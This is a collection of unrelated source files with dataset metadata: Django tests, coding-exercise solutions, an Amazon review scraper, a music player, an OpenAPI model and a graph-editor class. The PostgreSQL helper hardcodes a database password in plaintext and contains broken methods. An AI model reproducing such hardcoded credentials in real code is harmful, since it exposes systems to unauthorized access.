'<a>'},\n             {'q': {'id': 1, 'solved': False}, 'qt': {'id': 1, 'solved': False}, 'answers': ['<a>', '\" \\'', '456', '123']}, 4),\n        ]\n        \n        for test_case in test_cases:\n            data, expected, expected_ga_count = test_case\n\n            # submit data\n            response = self.client.post(reverse('submit_answer'), data)\n            self.assertEqual(response.status_code, 200)\n            \n            # check response\n            results = json.loads(response.content)\n            self.assertEqual(results, expected)\n            \n            # check number of GuessAttempt in database\n            self.assertEqual(GuessAttempt.objects.count(), expected_ga_count)\n        \n        \n    def testAnswerIsCorrect(self):\n        \"\"\"Check that correct answers solve quest tasks\"\"\"\n        # no guess attempts yet\n        self.assertEqual(GuessAttempt.objects.count(), 0)\n\n        # check correct answers in answer form\n        test_cases = [\n            ({'id': 1, 'answer': 'aaa'},\n             {'q': {'id': 1, 'solved': False}, 'qt': {'id': 1, 'solved': True, 'answer': 'aaa'}, 'answers': []}, 1),\n            ({'id': 1, 'answer': 'AAA'},\n             {'q': {'id': 1, 'solved': False}, 'qt': {'id': 1, 'solved': True, 'answer': 'aaa'}, 'answers': []}, 2),\n            ({'id': 1, 'answer': ' \\naAa \\t\\n'},\n             {'q': {'id': 1, 'solved': False}, 'qt': {'id': 1, 'solved': True, 'answer': 'aaa'}, 'answers': []}, 3),\n        ]\n        \n        for i, test_case in enumerate(test_cases):\n            data, expected, expected_ga_count = test_case\n            \n            # reset question\n            qt = QuestTask.objects.get(pk=data['id'])\n            qt.solved = False\n            qt.solved_at = None\n            qt.save()\n            \n            # submit data\n            response = self.client.post(reverse('submit_answer'), data)\n            self.assertEqual(response.status_code, 200)\n            \n            # check response\n            results = json.loads(response.content)\n            self.assertEqual(results, expected)\n            \n            # check number of GuessAttempt in database\n            self.assertEqual(GuessAttempt.objects.count(), expected_ga_count)\n\n            # check that the correct answer marks the question as solved\n            qt = QuestTask.objects.get(pk=data['id'])\n            self.assertTrue(qt.solved)\n            self.assertIsNotNone(qt.solved_at)\n        \n\n    def testAnswerAllQuestions(self):\n        \"\"\"Check that answering every task solves the whole quest\"\"\"\n\n        # check correct answers in answer form\n        test_cases = [\n            ({'id': 4, 'answer': 
'four'},\n 'answers': []},\n 1),\n ({'id': 5, 'answer': 'Earth'},\n {'q': {'id': 2, 'solved': True, 'answer': 'cookies everybody'},\n 'qt': {'id': 5, 'solved': True, 'answer': 'earth'},\n 'answers': []},\n 2),\n ]\n \n for i, test_case in enumerate(test_cases):\n data, expected, expected_ga_count = test_case\n \n # submit data\n response = self.client.post(reverse('submit_answer'), data)\n self.assertEqual(response.status_code, 200)\n \n # check response\n results = json.loads(response.content)\n self.assertEqual(results, expected)\n \n # check number of GuessAttempt in database\n self.assertEqual(GuessAttempt.objects.count(), expected_ga_count)\n\n","sub_path":"coolerquest/common/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"466886704","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nimport heapq\n\nclass Solution(object):\n def getAllElements(self, root1, root2):\n \"\"\"\n :type root1: TreeNode\n :type root2: TreeNode\n :rtype: List[int]\n \"\"\"\n \n self.res = []\n self.value_pq = []\n \n self.inorder(root1)\n self.inorder(root2)\n \n while self.value_pq:\n self.res.append(heapq.heappop(self.value_pq))\n \n return self.res\n \n def inorder(self, root):\n if not root:\n \n return \n \n self.inorder(root.left)\n heapq.heappush(self.value_pq, root.val)\n self.inorder(root.right)","sub_path":"practice/solution/1305_all_elements_in_two_binary_search_trees.py","file_name":"1305_all_elements_in_two_binary_search_trees.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"596974606","text":"import scrapy\nfrom bs4 import BeautifulSoup\nimport re\nfrom amzproduct.items import ReviewItem\nfrom scrapy.spiders import CSVFeedSpider\nfrom scrapy.http import Request\nfrom scrapy.utils.project import get_project_settings\n# CSVFeedSpider\nclass ReviewSpider(CSVFeedSpider):\n name = 'reviewSpider'\n allowed_domains = [\"amazon.com\"]\n custom_settings = {\n 'LOG_LEVEL': 'ERROR',\n 'LOG_ENABLED': True,\n 'LOG_STDOUT': True\n }\n # start from the first page of search result\n start_urls = ['https://www.amazon.ca/s?k=table+lamp&qid=1584766372&ref=sr_pg_1']\n\n def __init__(self):\n self.declare_path()\n # self.asin = ''\n self.baseUrl = 'https://www.amazon.ca'\n\n \n def declare_path(self):\n \"\"\"Set the XPath of our target items\"\"\"\n self.review_urlXpath = '//*[@id=\"reviews-medley-footer\"]/div[2]/a/@href'\n self.dataCSS = '#cm_cr-review_list'\n self.reviewerCSS = '.a-profile-name'\n self.contentCSS = '.review-text'\n self.titleCSS = '.review-title'\n self.dateCSS = '.review-date'\n self.rateCSS = '.review-rating'\n self.asinXpath = '//*[@id=\"prodDetails\"]/div/div[2]/div[1]/div[2]/div/div/table/tbody/tr/td[starts-with(text(),\"ASIN\")]/../descendant::text()'\n self.asinXpath2 = '//*[@id=\"detail_bullets_id\"]/table/tr/td/div/ul/li/b[starts-with(text(),\"ASIN\")]/../descendant::text()'\n \n\n def parse(self, response):\n \"\"\"Iterate every page of a auction and enter every link of the item\"\"\"\n # lastUrl = ''\n for item_link in response.xpath('//*[@class=\"a-link-normal a-text-normal\"]/@href').extract(): \n url = self.baseUrl + item_link\n yield Request(url=url,callback=self.parse_item, dont_filter=True,meta = {'dont_redirect': 
True, \"handle_httpstatus_list\" : [301, 302, 303]})\n\n        pagination_link = response.css('li.a-last a::attr(href)')[0].extract()\n        pagination_url = self.baseUrl + pagination_link\n        yield Request(url=pagination_url,callback=self.parse, dont_filter=True)\n\n    def parse_item(self,response):\n        \"\"\"scrape the asin and review link\"\"\"\n        if response.xpath(self.asinXpath).extract()!=[]:\n            Asin = response.xpath(self.asinXpath).extract()\n        else:\n            Asin = response.xpath(self.asinXpath2).extract()\n        self.asin = self.cleanText(self.parseText(self.listToStr(Asin)))\n        reviewUrl = response.xpath(self.review_urlXpath)[0].extract()\n        url = self.baseUrl + reviewUrl\n        yield Request(url=url,callback=self.parse_review, dont_filter=True,meta = {'dont_redirect': True, \"handle_httpstatus_list\" : [301, 302, 303]})\n\n\n    def parse_review(self,response):\n        \"\"\"Parse each review\"\"\"\n        #Get the Review List\n        data = response.css(self.dataCSS)\n        #Get the Name\n        reviewers = data.css(self.reviewerCSS)\n        #Get the Review Title\n        titles = data.css(self.titleCSS)\n        # Get the Ratings\n        ratings = data.css(self.rateCSS)\n        # Get the dates\n        dates = data.css(self.dateCSS)\n        # Get the users Comments\n        comments = data.css('.review-text')\n\n        count = 0\n        #length = len(title)\n\n        for title in titles:\n            item = ReviewItem()\n\n            Reviewer = reviewers[count].xpath(\".//text()\").extract()\n            Reviewer = self.cleanText(self.parseText(self.listToStr(Reviewer)))\n\n            Rate = ratings[count].xpath(\".//text()\").extract()\n            Rate = self.cleanText(self.parseText(self.listToStr(Rate)))\n\n            Date = dates[count].xpath(\".//text()\").extract()\n            Date = self.cleanText(self.parseText(self.listToStr(Date)))\n\n            Title = titles[count].xpath(\".//text()\").extract()\n            Title = self.cleanText(self.parseText(self.listToStr(Title)))\n\n            Content = comments[count].xpath(\".//text()\").extract()\n            Content = self.cleanText(self.parseText(self.listToStr(Content)))\n\n            item['asin'] = self.asin\n            item['reviewer'] = Reviewer\n            item['rate'] = Rate\n            item['date'] = Date\n            item['title'] = Title\n            item['content'] = Content\n\n            yield item\n            count +=1\n\n        #if count>=length:\n        # after finishing the last review, go to the next page\n        pagination_link = response.xpath('//*[@id=\"cm_cr-pagination_bar\"]/ul/li[2]/a/@href')[0].extract()\n        pagination_url = self.baseUrl + pagination_link\n        yield Request(url=pagination_url,callback=self.parse_review, dont_filter=True)\n\n    #Methods to clean and format text to make it easier to work with later\n    def listToStr(self,MyList):\n        dumm = \"\"\n        MyList = [i.encode('utf-8') for i in MyList]\n        for i in MyList:dumm = \"{0}{1}\".format(dumm,i)\n        return dumm\n    \n    def parseText(self, str):\n        soup = BeautifulSoup(str, 'html.parser')\n        return re.sub(\" +|\\\\n|\\\\r|\\\\t|\\\\0|\\\\x0b|\\\\xa0\",' ',soup.get_text()).strip()\n    \n    def cleanText(self,text):\n        soup = BeautifulSoup(text,'html.parser')\n        text = soup.get_text()\n        text = re.sub(\"( +|\\\\n|\\\\r|\\\\t|\\\\0|\\\\x0b|\\\\xa0|\\\\xbb|\\\\xab)+\",' ',text).strip()\n        return text\n","sub_path":"amzproduct/amzproduct/spiders/reviewSpider.py","file_name":"reviewSpider.py","file_ext":"py","file_size_in_byte":5213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"259475968","text":"\"\"\"\nCreate an algorithm that asks for 3 values representing the sides of a triangle.\nAssume that the order in which the values are given does not matter:\nthe hypotenuse may come first and the legs after, or the legs first and then the hypotenuse, etc.\nAlso create a function that receives the vector and reports whether the given sides form a right triangle.\nYou can use the Pythagorean theorem to help with the solution: hypotenuse^2 = leg1^2 + leg2^2.\n\"\"\"\n\n
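# For example, sides [3, 4, 5]: 3**2 + 4**2 == 5**2 holds, so the right-triangle\n# message is printed; sides [2, 3, 4] fail the check (4 + 9 != 16).\n\n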
def hipt(vetor,t):\n    if vetor[0] > vetor[1] and vetor[0] > vetor[2]:\n        hipo = vetor[0]\n        vet1 = vetor[1]\n        vet2 = vetor[2]\n    elif vetor[1] > vetor[0] and vetor[1] > vetor[2]:\n        hipo = vetor[1]\n        vet1 = vetor[0]\n        vet2 = vetor[2]\n    else:\n        hipo = vetor[2]\n        vet1 = vetor[0]\n        vet2 = vetor[1]\n\n    if (vet1**2) + (vet2**2) == (hipo**2):\n        print('It is a right triangle')\n    else:\n        print('It is not a right triangle')\n\n\n\n\n\n\ntam = 3\nv = [0]*tam\nfor i in range(tam):\n    v[i] = int(input('Enter the value of one side of the triangle: '))\n\n\nhipt(v, tam)\n","sub_path":"Exercicios_basicos/ppe/listaExercicio/ex04.py","file_name":"ex04.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"85800510","text":"# coding: utf-8\n\n\"\"\"\n    madana-api\n\n

    API Quickstart Guide\n\n    This documentation contains a Quickstart Guide, a few sample clients for download and information about the available endpoints and DataTypes\n\n    The MADANA Explorer can be used to verify the interactions with the API\n\n    Internal use only. For more information visit www.madana.io  
# noqa: E501\n\n The version of the OpenAPI document: 0.4.12\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom madana_sampleclient_python.configuration import Configuration\n\n\nclass JsonDatasetInfo(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'signature': 'str',\n 'size': 'str',\n 'hash': 'str',\n 'creationdate': 'str',\n 'fingerprint': 'str'\n }\n\n attribute_map = {\n 'signature': 'signature',\n 'size': 'size',\n 'hash': 'hash',\n 'creationdate': 'creationdate',\n 'fingerprint': 'fingerprint'\n }\n\n def __init__(self, signature=None, size=None, hash=None, creationdate=None, fingerprint=None, local_vars_configuration=None): # noqa: E501\n \"\"\"JsonDatasetInfo - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._signature = None\n self._size = None\n self._hash = None\n self._creationdate = None\n self._fingerprint = None\n self.discriminator = None\n\n if signature is not None:\n self.signature = signature\n if size is not None:\n self.size = size\n if hash is not None:\n self.hash = hash\n if creationdate is not None:\n self.creationdate = creationdate\n if fingerprint is not None:\n self.fingerprint = fingerprint\n\n @property\n def signature(self):\n \"\"\"Gets the signature of this JsonDatasetInfo. # noqa: E501\n\n # noqa: E501\n\n :return: The signature of this JsonDatasetInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._signature\n\n @signature.setter\n def signature(self, signature):\n \"\"\"Sets the signature of this JsonDatasetInfo.\n\n # noqa: E501\n\n :param signature: The signature of this JsonDatasetInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._signature = signature\n\n @property\n def size(self):\n \"\"\"Gets the size of this JsonDatasetInfo. # noqa: E501\n\n # noqa: E501\n\n :return: The size of this JsonDatasetInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._size\n\n @size.setter\n def size(self, size):\n \"\"\"Sets the size of this JsonDatasetInfo.\n\n # noqa: E501\n\n :param size: The size of this JsonDatasetInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._size = size\n\n @property\n def hash(self):\n \"\"\"Gets the hash of this JsonDatasetInfo. # noqa: E501\n\n # noqa: E501\n\n :return: The hash of this JsonDatasetInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._hash\n\n @hash.setter\n def hash(self, hash):\n \"\"\"Sets the hash of this JsonDatasetInfo.\n\n # noqa: E501\n\n :param hash: The hash of this JsonDatasetInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._hash = hash\n\n @property\n def creationdate(self):\n \"\"\"Gets the creationdate of this JsonDatasetInfo. # noqa: E501\n\n # noqa: E501\n\n :return: The creationdate of this JsonDatasetInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._creationdate\n\n @creationdate.setter\n def creationdate(self, creationdate):\n \"\"\"Sets the creationdate of this JsonDatasetInfo.\n\n # noqa: E501\n\n :param creationdate: The creationdate of this JsonDatasetInfo. 
# noqa: E501\n :type: str\n \"\"\"\n\n self._creationdate = creationdate\n\n @property\n def fingerprint(self):\n \"\"\"Gets the fingerprint of this JsonDatasetInfo. # noqa: E501\n\n # noqa: E501\n\n :return: The fingerprint of this JsonDatasetInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._fingerprint\n\n @fingerprint.setter\n def fingerprint(self, fingerprint):\n \"\"\"Sets the fingerprint of this JsonDatasetInfo.\n\n # noqa: E501\n\n :param fingerprint: The fingerprint of this JsonDatasetInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._fingerprint = fingerprint\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, JsonDatasetInfo):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, JsonDatasetInfo):\n return True\n\n return self.to_dict() != other.to_dict()\n","sub_path":"madana_sampleclient_python/models/json_dataset_info.py","file_name":"json_dataset_info.py","file_ext":"py","file_size_in_byte":6777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"650437753","text":"import pandas as pd\nimport psycopg2 as pg\nimport pandas.io.sql as psql\nimport os\nimport time\nfrom datetime import datetime\n\nlogfile_dir=\"/home/infografico/coopecg/log/\"\nclass pypo():\n def __init__(self):\n self.conn = pg.connect(\"dbname=postgres host=172.16.1.101 port=5432 user=postgres password=infografico\")\n\n def run_sql(self, mquery):\n resultado = psql.read_sql(mquery, self.conn)\n return resultado\n\n def log_write(New_String):\n if not(os.path.exists(logfile_dir)):\n os.mkdir(logfile_dir)\n filename = str(datetime.now().strftime('%d%m%Y'))\n log_time = str(datetime.now().strftime('%d%m%Y %H:%M:%S') +': ')\n with open(logfile_dir + '/' + filename , 'a+') as fh1:\n fh1.write(log_time + New_String +'\\n')\n time.sleep(0.1)\n\n def file_count(file_):\n with open(file_) as f:\n count = sum(1 for _ in f)\n return count\n\n def data_write(New_String):\n if not(os.path.exists(datafile_dir)):\n os.mkdir(datafile_dir)\n log_time = str(datetime.now().strftime('%d%m%Y %H:%M:%S'))\n with open(datafile_dir + '/' + data_filename , 'a+') as fh2:\n fh2.write(log_time + ',' + New_String +'\\n')\n time.sleep(0.1)\n","sub_path":"src/pypo.py","file_name":"pypo.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"152093323","text":"'''\nCreated on May 15, 2014\n\n@author: john\n'''\n\nfrom cs1lib import *\nfrom quicksort import sort\nfrom cities import read_file, compare_objects_population\nfrom time 
import sleep\n\nWINDOW_WIDTH = 720\nWINDOW_HEIGHT = 360\nPIXELS_PER_LATITUDE = WINDOW_HEIGHT / 180.0\nPIXELS_PER_LONGITUDE = WINDOW_WIDTH / 360.0\n\nNUMBER_OF_CITIES_SHOWN = 50\n\ncities = read_file()\nsort(cities, compare_objects_population)\n\ndef main():\n    \n    set_fill_color(1.0, 0.0, 0.0)\n    enable_stroke()\n    clear()\n    # load and draw image\n    image = load_image(\"world.png\")\n    draw_image(image, 0, 0)\n    \n    cities_drawn = []\n    \n    for city in cities[: NUMBER_OF_CITIES_SHOWN + 1]:\n        blink = True\n        for i in range(2*3 + 1):\n            \n            clear()\n            # load and draw image\n            image = load_image(\"world.png\")\n            draw_image(image, 0, 0)\n            \n            # Redraw done cities\n            for drawn_city in cities_drawn:\n                drawn_city.draw(PIXELS_PER_LONGITUDE, PIXELS_PER_LATITUDE) \n            \n            # Draw new city\n            city.draw(PIXELS_PER_LONGITUDE, PIXELS_PER_LATITUDE, True, blink)\n            \n            request_redraw()\n            # Toggle blink\n            blink = not blink\n            # Check if window is closed\n            if window_closed():\n                break\n            sleep(0.1)\n        # Add the city now done to the list of done cities\n        cities_drawn.append(city)\n        if window_closed():\n            break\n        #sleep(0.01)\n        \n    \n    \n    clear()\n    # load and draw image\n    image = load_image(\"world.png\")\n    draw_image(image, 0, 0)\n    \n    # Redraw done cities\n    for drawn_city in cities_drawn:\n        drawn_city.draw(PIXELS_PER_LONGITUDE, PIXELS_PER_LATITUDE)\n    \n\nstart_graphics(main, \"30 Most Populous Cities\", WINDOW_WIDTH, WINDOW_HEIGHT, True)","sub_path":"Lab 3/visualize_cities.py","file_name":"visualize_cities.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"95900768","text":"from pygame import mixer\nfrom tkinter import *\nfrom PIL import Image\nfrom PIL import ImageTk\nimport os\nimport random\nimport threading\nimport sys\nfrom time import sleep\n\nclass Music_Player:\n    def __init__(self):\n        self.cur_path = os.getcwd()+'\\\\downloads'\n        self.button_src = os.getcwd()+'\\\\button'\n        self.filelist = []\n        self.playlist = []\n        self.ispause = False\n        self.loop_play_times = 0\n        self.isloop_play = False\n        self.count = 0\n        self.is_next_song = False\n        \n        self.israndom_play = False\n        self.nowplaying = str()\n        \n        mixer.init()\n        self.window = Tk()\n        self.window.geometry(\"1200x800\")\n        self.window.title(\"mp3 player\")\n        self.window.configure(background = \"#367B34\")\n        \n        self.pause_png = Image.open(self.button_src+\"\\\\pause.png\" )\n        self.pause_png = ImageTk.PhotoImage(self.pause_png)\n        self.next_song_png = Image.open(self.button_src+\"\\\\next_song.png\")\n        self.next_song_png = ImageTk.PhotoImage(self.next_song_png)\n        self.previous_song_png = Image.open(self.button_src+\"\\\\previous_song.png\")\n        self.previous_song_png = ImageTk.PhotoImage(self.previous_song_png)\n        self.play_png = Image.open(self.button_src+\"\\\\play.png\")\n        self.play_png = ImageTk.PhotoImage(self.play_png)\n        self.loop_play_png = Image.open(self.button_src+\"\\\\loop_play.png\" )\n        self.loop_play_png = ImageTk.PhotoImage(self.loop_play_png)\n        self.random_play_png = Image.open(self.button_src+\"\\\\random_play.png\" )\n        self.random_play_png = ImageTk.PhotoImage(self.random_play_png)\n        \n        frame1 = Frame(self.window, bg=\"#367B34\")\n        frame1.pack()\n        \n        file_tree = os.walk(self.cur_path)\n        #print(file_tree)\n        for i,j,files in file_tree:\n            self.filelist = files\n        \n        print(self.filelist)\n        \n        for file_index in range(len(self.filelist)):\n            self.filelist[file_index] = 'downloads\\\\'+ self.filelist[file_index]\n        \n        self.playlist = self.filelist+[]\n        #print(self.filelist)\n        \n        
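# NOTE: the triple-quoted block below is leftover code from an earlier\n        # text-label UI; as a bare string literal it has no effect at runtime.\n        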
\"\"\"self.pause_text = StringVar()\n self.pause_text.set(\"play\" if self.ispause else \"pause\")\n self.loop_text = StringVar()\n self.loop_text.set(\"single play\" if self.isloop_play else \"loop play\")\n self.random_text = StringVar()\n self.random_text.set(\"order play\" if self.israndom_play else \"random play\")\n \"\"\"\n \n self.label_text = StringVar()\n self.volume = 30\n \n \n \n self.button1 = Button(frame1, image = self.pause_png , command = self.pause, bg=\"#367B34\")\n self.button1.grid(row = 0, column = 0, padx = 5, pady = 5)\n button2 = Button(frame1, image = self.loop_play_png , command = self.loop_play, bg=\"#367B34\")\n button2.grid(row = 0, column = 1, padx = 5, pady = 5)\n button3 = Button(frame1, image = self.random_play_png , command = self.random_play, bg=\"#367B34\")\n button3.grid(row = 0, column = 2, padx = 5, pady = 5)\n button4 = Button(frame1, image = self.next_song_png , command = self.next_song, bg=\"#367B34\")\n button4.grid(row = 0, column = 3, padx = 5, pady = 5)\n button5 = Button(frame1, image = self.previous_song_png , command = self.previous_song, bg=\"#367B34\")\n button5.grid(row = 0, column = 4, padx = 5, pady = 5)\n \n frame2 = Frame(self.window, bg=\"#367B34\")\n frame2.pack()\n label = Label(frame2,textvariable = self.label_text)\n label.pack()\n \n frame3 = Frame(self.window, bg=\"#367B34\")\n frame3.pack()\n valueBar = Scale(frame3,command = self.set_volume, from_= 0 , to = 100 , orient = \"horizontal\")\n valueBar.set(self.volume)\n valueBar.pack()\n \n mixer.music.load(self.playlist[self.count])\n mixer.music.set_volume(self.volume/100)\n mixer.music.play(loops = 0)\n self.nowplaying = self.playlist[self.count]\n self.label_text.set(self.nowplaying.replace(\"downloads\\\\\",\"\"))\n \n t = threading.Thread(target = self.play)\n t.setDaemon(True)\n t.start()\n \n self.window.protocol(\"WM_DELETE_WINDOW\",self.stop)\n self.window.mainloop()\n \n \n \n def decounter(self):\n if self.count == 0 and not self.isloop_play:\n self.count = len(self.playlist)-1\n \n elif self.isloop_play:\n self.count = 0\n \n else:\n self.count -= 1\n \n def counter(self):\n if self.count == len(self.playlist)-1 or self.isloop_play:\n self.count = 0\n else:\n self.count += 1\n \n def random_play(self):\n if not self.israndom_play:\n \n random.shuffle(self.playlist)\n self.label_text.set(self.nowplaying)\n self.israndom_play = True\n \n else:\n self.playlist = self.filelist\n self.count = self.playlist.index(self.nowplaying)\n self.israndom_play = False\n \n #self.random_text.set(\"order play\" if self.israndom_play else \"random play\")\n \n def pause(self):\n if self.is_next_song:\n self.is_next_song = False\n \n if not self.ispause:\n mixer.music.pause()\n self.ispause = True\n self.button1.configure(image = self.play_png)\n else:\n mixer.music.unpause()\n self.ispause = False\n self.button1.configure(image = self.pause_png)\n \n self.button1.configure(image = self.play_png if self.ispause else self.pause_png)\n \n \n def next_song(self):\n self.ispause = False\n self.button1.configure(image = self.play_png if self.ispause else self.pause_png)\n mixer.music.stop()\n self.counter()\n mixer.music.load(self.playlist[self.count])\n mixer.music.play(loops = 0)\n self.nowplaying = self.playlist[self.count]\n self.label_text.set(self.nowplaying.replace(\"downloads\\\\\",\"\"))\n \n def previous_song(self):\n self.ispause = False\n self.button1.configure(image = self.play_png if self.ispause else self.pause_png)\n mixer.music.stop()\n self.decounter()\n 
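# decounter() has already stepped self.count back one track (wrapping to the\n        # end of the playlist when at index 0), so the track can be loaded directly.\n        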
mixer.music.load(self.playlist[self.count])\n mixer.music.play(loops = 0)\n self.nowplaying = self.playlist[self.count]\n self.label_text.set(self.nowplaying.replace(\"downloads\\\\\",\"\"))\n \n def loop_play(self):\n if self.isloop_play:\n self.playlist = self.filelist\n self.count = self.playlist.index(self.nowplaying)\n self.isloop_play = False\n else:\n self.playlist = [self.nowplaying]\n self.isloop_play = True\n \n #self.loop_text.set(\"single play\" if self.isloop_play else \"loop play\")\n \n def set_volume(self,volume):\n mixer.music.set_volume(int(volume)/100)\n \n def stop(self):\n mixer.music.stop()\n self.window.destroy()\n sys.exit()\n \n def play(self):\n while True:\n if not mixer.music.get_busy() and not self.ispause:\n self.next_song()\n sleep(0.25)\n \nMusic_Player()\n","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":7357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"358248061","text":"'''\nYou are given a string and your task is to swap cases. In other words, convert all lowercase letters to uppercase letters and vice versa.\n\nFor Example:\n\nWww.HackerRank.com → wWW.hACKERrANK.COM\nPythonist 2 → pYTHONIST 2 \nFunction Description\n\nComplete the swap_case function in the editor below.\n\nswap_case has the following parameters:\n\nstring s: the string to modify\nReturns\n\nstring: the modified string\nInput Format\n\nA single line containing a string .\n\nConstraints\n\n\nSample Input 0\n\nHackerRank.com presents \"Pythonist 2\".\nSample Output 0\n\nhACKERrANK.COM PRESENTS \"pYTHONIST 2\".\nlink- https://www.hackerrank.com/challenges/swap-case/problem\n\n'''\n# print ''.join([i.lower() if i.isupper() else i.upper() for i in input()])\n# print(\"\".join(map(str.swapcase, input())))\ndef swap_case(s):\n st=\"\"\n for i in s:\n if i==i.upper():\n i=i.lower()\n else:\n i=i.upper()\n st+=i \n return st\n\nif __name__ == '__main__':\n s = input()\n result = swap_case(s)\n print(result)","sub_path":"10X/Python/Array/Swap_cASE.py","file_name":"Swap_cASE.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"233988245","text":"# \n# editor.py\n# \n# Author(s):\n# Matteo Spallanzani \n# \n# Copyright (c) 2020-2021 ETH Zurich.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# \n\nimport itertools\nimport tempfile\nfrom collections import namedtuple\nfrom datetime import datetime\nfrom networkx.algorithms import bipartite\nimport networkx as nx\n\n# import graphs\n# import utils\n\nfrom .. import graphs\nfrom .. import grrules\nfrom .. 
import utils\n\n\n__FAILURE__ = False\n__SUCCESS__ = True\n\n\nCommit = namedtuple('Commit', ['rho', 'g', 'Gprime', 'nodes_dict'])\n\n\nclass History(object):\n\n def __init__(self, nx_graph, nodes_dict):\n self._nx_graph = nx_graph # keep track of the original object\n self._nodes_dict = nodes_dict\n self._undo = []\n self._redo = []\n\n def show(self):\n print(\"-- History --\")\n for i, commit in enumerate(self._undo):\n print(i, commit)\n\n def push(self, commit):\n self._undo.append(commit)\n self._redo.clear()\n\n def undo(self, n=1):\n for i in range(0, n):\n try:\n self._redo.append(self._undo.pop())\n except IndexError:\n print(\"Tried to undo {} steps, but history contained just {}. 'Undo' stack has been cleared.\".format(n, i))\n break\n\n def redo(self, n=1):\n for i in range(0, n):\n try:\n self._undo.append(self._redo.pop())\n except IndexError:\n print(\"Tried to redo {} steps, but history contained just {}. 'Redo' stack has been cleared.\".format(n, i))\n break\n\n def clear(self, force=False):\n\n if not force:\n confirmation = input(\"This action is not reversible. Are you sure that you want to delete all the history? [yes/NO]\")\n force = confirmation.lower() == 'yes'\n\n if force:\n self._undo.clear()\n self._redo.clear()\n\n\nclass Editor(object):\n\n def __init__(self, qlgraph, onlykernel=False, graphviz=False):\n\n self.qlgraph = qlgraph\n\n self._input_nodes = None\n self._output_nodes = None\n\n input_datanodes = {n for n, dp in nx.get_node_attributes(self.qlgraph.nx_graph, 'data_partition').items() if dp == graphs.DataPartition.INPUT}\n output_datanodes = {n for n, dp in nx.get_node_attributes(self.qlgraph.nx_graph, 'data_partition').items() if dp == graphs.DataPartition.OUTPUT}\n\n if onlykernel:\n\n input_opnodes = set(itertools.chain.from_iterable([set([s for s in self.qlgraph.nx_graph.successors(n)]) for n in input_datanodes]))\n output_opnodes = set(itertools.chain.from_iterable([set([p for p in self.qlgraph.nx_graph.predecessors(n)]) for n in output_datanodes]))\n\n self._input_nodes = input_opnodes\n self._output_nodes = output_opnodes\n\n G = bipartite.projected_graph(self.qlgraph.nx_graph, {n for n in self.qlgraph.nx_graph.nodes if self.qlgraph.nx_graph.nodes[n]['bipartite'] == graphs.Bipartite.KERNEL})\n\n else:\n\n self._input_nodes = input_datanodes\n self._output_nodes = output_datanodes\n\n G = self.qlgraph.nx_graph\n\n nodes_dict = {k: v for k, v in self.qlgraph.nodes_dict.items() if k in G.nodes}\n\n self._history = History(G, nodes_dict)\n self._in_session = False # put a lock on the history by preventing editing actions\n 